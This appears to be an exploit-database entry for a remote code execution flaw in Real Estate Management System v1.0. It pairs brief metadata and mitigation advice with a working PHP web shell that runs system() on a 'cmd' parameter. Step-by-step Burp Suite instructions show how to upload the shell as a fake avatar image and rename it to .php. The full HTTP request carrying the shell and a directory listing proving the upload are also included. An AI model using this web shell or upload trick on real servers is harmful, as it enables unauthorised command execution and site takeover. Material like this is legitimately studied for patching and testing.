header-logo
Suggest Exploit
vendor:
Real Estate Management System
by:
Diyar Saadi
6.1
CVSS
HIGH
Remote Code Execution
78
CWE
Product Name: Real Estate Management System
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE:
CPE: a:codeastro:real_estate_management_system:1.0
Metasploit:
Other Scripts:
Platforms Tested: Windows 11 + XAMPP 8.0.30
2024

Real Estate Management System v1.0 – Remote Code Execution via File Upload

The vulnerability in Real Estate Management System v1.0 allows an attacker to execute command injection payloads and upload malicious files to the web server.

Mitigation:

To mitigate this vulnerability, ensure that file uploads are properly validated and sanitized. Additionally, limit the types of files that can be uploaded and validate file extensions.
Source

Exploit-DB raw data:

# Exploit Title: Real Estate Management System v1.0 - Remote Code Execution via File Upload
# Date: 2/11/2024
# Exploit Author: Diyar Saadi
# Vendor Homepage: https://codeastro.com
# Version: V1.0
# Tested on: Windows 11 +  XAMPP 8.0.30 + Burp Suite Professional v2023.12.1.3


## Description ## 

This Vulnerability allow the attacker to execute command injection payloads and upload malicious file into web server .

-----------------------------------------------------------------------------------------------------------------------


## Simple RCE Payload : ##

<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
    if(isset($_GET['cmd']))
    {
        system_payload($_GET['cmd']);
    }
?>
</pre>
</body>
</html>
-----------------------------------------------------------------------------------------------------------------------
## Steps to Reproduce ## 

1- Open Burp Suite ( Community + Professional ) + Click on Proxy Tab Then Enable Intercept By Clicking at Intercept is off .
2- Open The Browser From Proxy Tab Then Open The Resgister Web Page : http://localhost:8080/realestate/register.php
3- Prepare Your RCE PHP Script Base From Notepad or Any Editor Then Save the RCE PHP Script Base as : avatar.php filename . 
4- Change The Filename extension into avatar.png ,  after save the RCE PHP Script .
5- Click Chose File From User Image Section Then Upload Your avatar.png file .
6- Click Register Then Back to Burp Suite Proxy Tab :
7- Modify File Extension Into Orginal File Extension that is : avatar.php in Example :  Content-Disposition: form-data; name="uimage"; filename="avatar.png"
Content-Type: image/png . 
8- After Modify The Content-Disposition From Burp Suite Proxy Tab Into Orginal File Extension Click Forward Button . 
9- Open The Login Page : http://localhost:8080/realestate/login.php Then Register Through Your Account Email & Password .
10 - From MenuBar Click My Account & Profile Then Right Click at Image Icon > Copy Link > New Tab > Paste > Your Malicious Command is Ready To Execute .!

-----------------------------------------------------------------------------------------------------------------------


## Burp Request : ##

POST /realestate/register.php HTTP/1.1
Host: localhost
Content-Length: 1100
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="121", "Not A(Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarywA99kZOAu8APGlhv
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/realestate/register.php
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close

------WebKitFormBoundarypgW90eleiRxRzcEK
Content-Disposition: form-data; name="name"

johnhamosh
------WebKitFormBoundarypgW90eleiRxRzcEK
Content-Disposition: form-data; name="email"

rasu1l@in.com
------WebKitFormBoundarypgW90eleiRxRzcEK
Content-Disposition: form-data; name="phone"

+199988764
------WebKitFormBoundarypgW90eleiRxRzcEK
Content-Disposition: form-data; name="pass"

<html> <body> <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"> <input type="TEXT" name="cmd" autofocus id="cmd" size="80"> <input type="SUBMIT" value="Execute"> </form> <pre> <?php     if(isset($_GET['cmd']))     {         system($_GET['cmd']);     } ?> </pre> </body> </html>
------WebKitFormBoundarypgW90eleiRxRzcEK
Content-Disposition: form-data; name="utype"

user
------WebKitFormBoundarypgW90eleiRxRzcEK
Content-Disposition: form-data; name="uimage"; filename="avatar.php"
Content-Type: image/png

<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
    if(isset($_GET['cmd']))
    {
        system($_GET['cmd']);
    }
?>
</pre>
</body>
</html>
------WebKitFormBoundarypgW90eleiRxRzcEK
Content-Disposition: form-data; name="reg"

Register
------WebKitFormBoundarypgW90eleiRxRzcEK--

-----------------------------------------------------------------------------------------------------------------------


## PoC Simple RCE Through This Vulnerability :  ##

Directory of C:\xampp\htdocs\realestate\admin\user 
          ..
02/11/2024  08:09 PM               315 avatar.php
02/11/2024  08:04 PM               315 avatar.png
02/11/2024  06:54 PM             9,376 avatarm2-min.jpg
02/11/2024  06:54 PM            13,186 avatarm7-min.jpg
02/11/2024  07:47 PM             1,814 avatars.php
02/11/2024  06:54 PM             1,313 gr7.png
02/11/2024  07:36 PM                28 poc.php

-----------------------------------------------------------------------------------------------------------------------


## Video PoC : ##

1- https://github.com/vulnerablecms/RCE-RealEstateVIDEOPOC/blob/main/PoC-RCE.mp4
2- https://gofile.io/d/AEWEgI
-----------------------------------------------------------------------------------------------------------------------


Greetz !